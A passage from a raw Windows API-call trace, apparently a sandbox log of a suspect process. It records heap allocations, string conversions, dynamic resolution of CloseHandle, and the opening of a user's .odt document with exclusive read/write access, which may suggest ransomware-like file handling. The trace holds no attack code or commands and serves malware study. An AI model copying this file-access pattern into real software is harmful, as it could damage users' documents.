dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0178.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0178.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0178.964] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0178.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt", cchWideChar=83, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0178.965] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x53) returned 0x8c4a48 [0178.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt", cchWideChar=83, lpMultiByteStr=0x8c4a48, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt", lpUsedDefaultChar=0x0) returned 83 [0178.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0178.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.965] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.965] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\orhlgisqmqrnaihm\\hivdx.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0178.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0178.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa6) returned 0x8fcbc0 [0178.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=83, lpWideCharStr=0x8fcbc0, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\hiVdX.odt") returned 83 [0178.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6cd8 [0178.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fcbc0 | out: hHeap=0x8a0000) returned 1 [0178.966] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.966] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0178.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.967] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.967] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0178.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0178.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0178.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0178.968] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0178.968] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.968] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0178.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0178.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0178.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0178.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.970] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0178.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0178.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0178.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0178.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0178.971] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0178.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0178.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0178.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0178.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0178.972] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0178.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0178.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.973] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0178.973] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd9c0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0178.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.973] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0178.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0178.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0178.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0178.974] CloseHandle (hObject=0x120) returned 1 [0178.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0178.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0178.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.974] FreeLibrary (hLibModule=0x75990000) returned 1 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: 